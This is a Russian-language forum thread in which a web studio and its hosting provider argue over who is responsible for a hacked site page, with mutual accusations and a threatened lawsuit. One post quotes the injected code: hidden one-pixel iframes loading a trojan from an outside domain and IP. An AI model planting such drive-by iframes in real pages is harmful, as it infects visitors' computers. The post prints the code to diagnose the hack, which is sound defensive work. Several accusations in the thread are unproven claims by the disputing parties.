Пункт 3 - самый маловероятный. Пункт 2 вероятен потому что есть какой-то левый IP.

Теперь на счет пункта 1. Я открыл сайт и посмотрел на ссылки в исходном коде. Нигде не нашел " Троянская программа является приложением Windows (PE EXE-файл)".
Может стоит объяснить точнее, где лежит троян?


P.S. У юристов есть расшифровка поговорки.
Клиент всегда прав, если он платит за свою правоту

О Боже… Я устала доказывать, что из нас троих ни кто ничего не менял. ЦыЦырую сама себя. В самом начале я рассказывала, что права доступа нам вернули в 8 вечера, в три ночи я проверила сайт и страница, которую залил хостер, была с ошибками. Хостер обвинил нас в том, что, получив права, мы изменили файл, что является ЛОЖЬЮ!!! И хватит об этом уже! Из пустого в порожнее переливаете! Не можете доказать свою правоту, а продолжаете лечить народ байками о своей непогрешимости. Вам показали сайт с вирусом? Он там есть или нет? Что Вам еще надо? Какие собственно доказательства? Доказательства того, что если Вы не замечаете проблемы, то и другим не стоит, или другими словами, что ее просто нет? Если Вы его (вирус) до сих пор не увидели, то стоит наверное предупредить остальных пользователей об опасности иметь с Вами дело.

А про вопрос, кто взломал сайт… я с Вас улыбаюсь? Кто как не Вы, должны были ВЫЧИСЛИТЬ ЭТОГО ЧЕЛОВЕКА??? И разве трудно определить, кто же скрывается под тем самым третьим IP??? Кому, как не Вам доподлинно известно, что все действия на сервере Вы не только можете, но и обязаны отслеживать! Кто как не Вы, должны следить за безопасностью и вовремя латать дыры, если таковые появляются? И последнее, кто как не Вы является хозяином сервера, на котором произошли и ПРОИСХОДЯТ проблемы. А Вы здесь сидите и рассуждаете обо всем этом, как, совершенно посторонние люди, просто беседующие о проблеме, которая Вас, как бы, и не особо касается. Принимайте меры, дорогие Тутхостовцы. Этот топик, читают и ВАШИ клиенты, между прочим, и думается, Ваша реакция на все происходящее вызывает у них некоторую озабоченность. А не дай Бог, если еще кто то пострадает от Вашей… гм… хотелось бы помягче, так как не хочу никого пугать, но скажу, так как есть, от Вашей НЕКОМПЕТЕНТНОСТИ и БЕЗАЛАБЕРНОСТИ.

Посмотрите на сайт с вирусом, прочтите все от начала и до конца, и скажите, ТАК В ЧЕМ ЖЕ ВСЕ-ТАКИ НЕ ПРАВ КЛИЕНТ, не важно платит он за свою правоту или нет. В данном, конкретном случае, в чем не прав???

Значит кто-то у вас украл пароль. Вот скажите в чем наша вина в том что у вас украли пароль? Мы что ли его всем раздавали? Или нам каждый день отслеживать всех кто заходил к вам на фтп и рассказывать вам мол вот подозрительный айпи, не вы ли это?
В данном случае вам просто нужно было сменить пароль, что впринципе вы и сами могли сделать, так как панель управления позволяет это. Мы нашли вам причину того почему изменялся файл, вы все также продолжаете упорно обвинять нас, что это вирус на нашем сервере и что другим юзерам грозит опасность, что есть полной ложью с вашей стороны, так как вирус был только на вашем аккаунте и не по нашей вине.

Вы нашли??? Серьезно? Да ну?.......... Бэз кометариев...

А слабо посчитать до трех? Я даже не прошу до шести, семи... до трех. Не, ну если у Вас склероз, тогда это к доктору...

С самого начала рассказывала о манере общения наших апанентов в стиле «Сам дурак» Вот Вам пример – Вы лжете, нет Вы лжете, нет Вы… Я не удивляюсь, привыкла как то уже…


Добавить могу только одно, я была не права, признаю, Вы действительно кое в чем компетентны, даже скажу больше, Вы просто профи! А именно, в СЛОВОБЛУДИИ!

Вам провести по остальным двум аккаунтам - такую же дисскусию?

Утомили честное слово
Это обвинение в адрес клиента.
Бездоказательное. Следовательно клеветническое (имхо).
Поздравляем Вас с новым витком в отношении клиентов.
Докатились.

Это не обвинение это предположение, выдвигать же вердикт в данном случае невозможно ибо сам клиент уже сам выдвинул вердикт, что виноват хостер в том, что у него на сервере находитсся вирус и что всем пользователям грозит опасносность. Нами же на данный момент не обнаружено вирусов на всех аккаунтах пользователей, только на этих 3-х, повторюся еще раз ТРЕХ. Искать дальше не вижу смысла откуда взялся вирус, хотя бы по той причине, что не знаю кто был тем третим IP который заходил по ФТП, на главный ФТП АККАУНТ пользователя и изменял тот самый index.html

Ну вот... уважаемые Тутхостовцы, за что боролись, как говориться... Кстати, как я говорила, я знакома со стилем их общения (конкретно Соляриса), поэтому могу предсказать следующую фразу. Когда у них заканчиваются аргументы, звучит примерно следующее "Короче, нам нечего больше сказать! Как хотите так и думайте, если Вам так удобно! Все, заканчиваем разговор. Вы не возможно упрямы и если Вы не верите компетентным людям, то нам нечего больше сказать" Эта фраза и ее модификации настолько мне знакомы, что удивлюсь, если она в какой то момент здесь не прозвучит. Посмотрим, поглядим...

Так вот и не выдвигайте, ибо сейчас звучит именно так, мы не "брякнули". Если Вы прочитаете логи разговоров, то убедитесь что тезис о непогрешимости хостера в плане этих проблем выдвигался и не раз. То что Вы сейчас изменили своё мнение по этому поводу это хорошо, респект, жаль что немного запоздали.
Кто виноват в самом хаке - клиент или хостер, в данной ситуации совершенно очевидно не выяснить. Кто виноват в том что появился этот конфликт между хостером и клиентом, наше личное мнение, что хостер в начале повел себя не так как следовало бы что бы избежать конфликта, а клиент просто проявил отсутствие знаний.

Минуточку

Вот ЭТО что если не обвинение? И бездоказательное? Что за утверждение о краже пароля именно на стороне клиента? Просто сваливание ответственности на клиента! Или Вы сами его украли? (иначе откуда бы были так уверены )

[quote=edogs,03.12.2005, 15:29]
Минуточку

Значит кто-то у вас украл пароль. [/quote]
Вот ЭТО что если не обвинение? И бездоказательное? Что за утверждение о краже пароля именно на стороне клиента? Просто сваливание ответственности на клиента! Или Вы сами его украли? (иначе откуда бы были так уверены )

[/quote]

Да, бесполезно давить на них аргументами. Не проймешь, будут повторять как попки, одно и то же... Поэтому нужен некий механизм, который бы дал возможность пользователям наказывать нерадивых хостеров. Пока, согласитесь, мы находимся в более бесправном положении. Если даже простого признания свой неправоты, невозможно добиться. Все на форуме знают, что мне даже деньги предлагали, за что, только, непонятно... Компенсация чего, собственно, должна была быть? Или подкуп, как я его понимаю. Мол "Мы те денег дали, ну так сиди и молчи в тряпочку" А хочется все-таки, признания хостера в том, что он, ни с данной задачей ни справился, ни с обязанностями, которыми он сам себя обременил, взявшись за этот бизнес.

Все же это было предположение, а не утверждение, может оно и прозвучало как утверждение.
Отнекиваться я не собираюсь. Если вам показалось это утверждением - прошу прощения за это.

Если кому ни будь интересно.

В коде страницы были обнаружены следующие строки:

<iframe src="http://perlomania.com/sp/index.html" width=1 height=1></iframe><iframe src="http://85.255.114.140/index.html" width=1 height=1></iframe>

Во общем с этого ip начинается загрузка вируса.

То есть запускается страница, и открывается маленький фрейм, откуда начинает к вам просачивается прелестный троянчик.

Вируса на сайте я не обнаружил. Потому что к сожалению не пользуюсь антивирусным софтом, так как работаю под ОС Linux, где с вирусами не так печально как в Windows.

Однако это лирика. Перейдем к делу. В описание вируса говорится что это exe файл.
Вопрос - где ссылка на этот exe файл в странице?

У меня при попытке открытия выскакивает java апплет. Запустить я его не могу, т.к. не использую java в рабочем браузере, а тестировать лень.

В то-же время утверждается, что на другом хостинге ифрейма в файле нет. Следовательно кто-то его меняет (так как фигурирует 3-й ip).

Рекомендую сменить пароль и выслать его владельцу на mail, а так же убедится что на аккаунте нет левый ftp-аккаунтов. Делать это должен хостер, просмотрев файл и ftp аккаунтами и удалив все лишнее.
Далее необходимо проверить, будут ли безуспешные попытки авторизации через этот самый 3-й IP.

Так же надо проверить логи - небыло ли попытки пролома через frontpage ext. Видел несколько раз, как через FP прописывали левую запись в ftp, которая не видна с панели.

Черт мне уже стыдно за наши поддержки хостингов.



Читайте пожалуйста внимательно описание вируса.

Читаем внимательно:


Далее читаем по вирусу:


Что я и наблюдал у себя на копьютере.

А теперь когда все уже высказали свое мнение, я хотел бы обратиться к Studio Master Video с просьбой ответить за свои слова и написать здесь в чем заключается мстительность, некомпетентность и хамство нашей компании ?

Уклонение от ответа буду считать признанием того, что вы не правы относительно своего высказывания и согласны на переименование темы.

P.S. я специально попрошу их зайти еще раз в эту тему и ответить на этот простой вопрос. За свои слова надо отвечать.

Ну что ж, Вы вынудили нас ответить Вам, а именно скопировать сюда текст письма, адресованный админу, на его просьбу изменить название. Надеюсь, он не будет за это в обиде. (скопировано будет только то, что относиться к теме)
И так…

«…Мы выполним Вашу просьбу, еще и потому, что Вы отнеслись к нам далеко не враждебно, а даже наоборот. За что мы Вам искренне благодарны, и в особенности админ, который, и пишет это письмо, от лица всех трех пострадавших. Теперь текст пойдет лично от админа. Я, как и прежде считаю, что слова, написанные мною, от и до, справедливы. Но, ни в коей мере не хочу проявлять глупое упрямство, поэтому, могу предложить оставить только два слова из трех. Слово мстительность можно убрать, так как оно не доказуемо в данной ситуации. Хотя компания мстила нам и наверняка продолжает. А те угрозы «Ну Вы ответите за свои слова», которые звучали в асе, после создания нашего топика, уже сейчас воплощаются в жизнь. На мой комп была произведена сетевая атака, с внедрением вируса, после чего, Доктор веб стал принимать все файлы ехе за Троянов. И еще одна существенная деталь. На компе лежала версия сайта smv.od.ua и именно она бесследно исчезла вместе с папкой. Почему именно эта папка, и кому это было выгодно, кто, собственно, влез в комп, могу только предполагать. К счастью у меня есть хорошая привычка, все важное дублировать на диски, так что, люди не добились свой цели. Еще раз говорю, что эти факты не доказуемы, хотя имеют место быть. Что касается двух слов некомпетентность и хамство… Считаю, что первое, отражает суть работы этой компании, что и было доказано в топике. А второе, ясно выражено в действиях той же компании, по отношению к клиенту, что можно увидеть из бесед в асе. (Хотя, опять таки, со мной можно не соглашаться, однако, я имею право иметь свое мнение по этому вопросу) Поэтому, я очень прошу оставить эти два слова, ибо и нынешние клиенты и будущие, должны знать, что их ждет, если, не дай Бог, попадут в подобную ситуацию. Я с удовольствием выслушаю Ваши предложения, если все же, это название неприемлемо…»

Теперь комментарии:
«Ну Вы ответите за свои слова» эта фраза, как все видят, прозвучала не только в асе при личной беседе, но и сейчас в форуме, хотя и в намного более мягкой форме. Так что доказывать, уже ничего не надо.
Что касается исчезновения папки с сайтом, она пропала после опубликования этого топика. В данном случае, я не могу ничего доказать, а могу только высказать свое подозрение. Другими словами «Кому это было выгодно... на того и думай»
Вопросы еще есть?

Не слабо вы наезжаете.

Помоему эту тему надо оставить в покое. Все сделали свои выводы. И у всех они свои.

В данный момент вы пытаетесь решить свою проблему наглым путем. Посмотрите как другие разрешали проблемы.

Советую извинится, признать свои ошибки, и сообщить как вы в дальнейшем собираетесь решать данные проблемы.

Studio Master Video, я снимаю свою просьбу. Она не вписывается в предъявленный Вам ультиматум. Переименование темы оставляю на Ваше усмотрение, новый текст, если он будет, сообщите мне на ПМ.

Solaris (14:00) :
Вопрос вы готовы за то что вы снова о нас написали ответить в суде ?
Solaris (14:01) :
подобной клеветы я уже давно не встречал
Alex (14:01) :
Денис, Вы точно не дружите с мозгами, да?
Solaris (14:01) :
Я задал вопрос ответьте на него
Solaris (14:01) :
вы наверное не понимаете насколько вы серьезные обвинения против нас выдвинули
Solaris (14:02) :
и я сейчас серьезен как никогда
Solaris (14:03) :
так что готовы ?


Прочтите пожалуйста текст, и скажите, что Вы про это думаете? Этолько что пришло в асю Интересно у этого человека вобще есть совесть?

Интересно как они собираются подать в суд. Что оскорбили? оклеветали? а как доказывать собираетесь?

А если вам встречный иск предъявят? нарушение прав покупателя, не качественные услуги, финансовые потери, моральные издержки.

Я думаю вам дороже выйдет.

Очередное заявление, не имеющее под собой не 1 факта.
Сначала вы говорили, что мы не отдаем домены, хотя мы требовали лишь выполнения правил, когда вы их выполнили все три домена были переведены.
Теперь когда вам нечего сказать вы придумали сказку про атаки на вас.


То что я говорил что за свои слова надо отвечать я не отрицаю, но имел я в виду далеко не угрозу, а то что за каждым вашим словом должны стоять факты.

На мой комп раньше в день было по десяток атака и что с того ? Ребята поздравляю вы попали в Интернет, в котором есть спам, вирусы, атаки и сетевые угрозы, только не надо все их вешать на нас.

По поводу обвинений в хамстве и некомпетентности вы снова ничего не смогли показать, где мы вам хамили.

Не наезжаю, а призываю следить за своими словами и если против нас есть обвинения то предьявить факты.


Если вы внимательно читали все наши беседы, то я извинялся и не раз, хотя причины для извинений не было не одной.

И еще 1 факт:
http://tuthost.com/~smvideo/
Работает не так ли ? И ошибок нет. А это копия все того же злополучного файла, только сейчас мы на своем сервере сменили пароль на фтп и закрыли открытый smv фтп-аккаунт, через который доступ на сервер имели их знакомые.

По приведенному тексту думаю, что совесть здесь ни при чем. Вами предприняты определенные действия, другая сторона предлагает эти действия оценить цивилизованным путем, через суд, а не полагаться на мнение общественности. Логично.

А о ситуации же в целом я думаю, что обе стороны уже зашли слишком далеко и выбираться из всего этого тема им не помогает, а наоборот затягивает конфликт глубже. Поэтому считаю, что ее разумнее закрыть.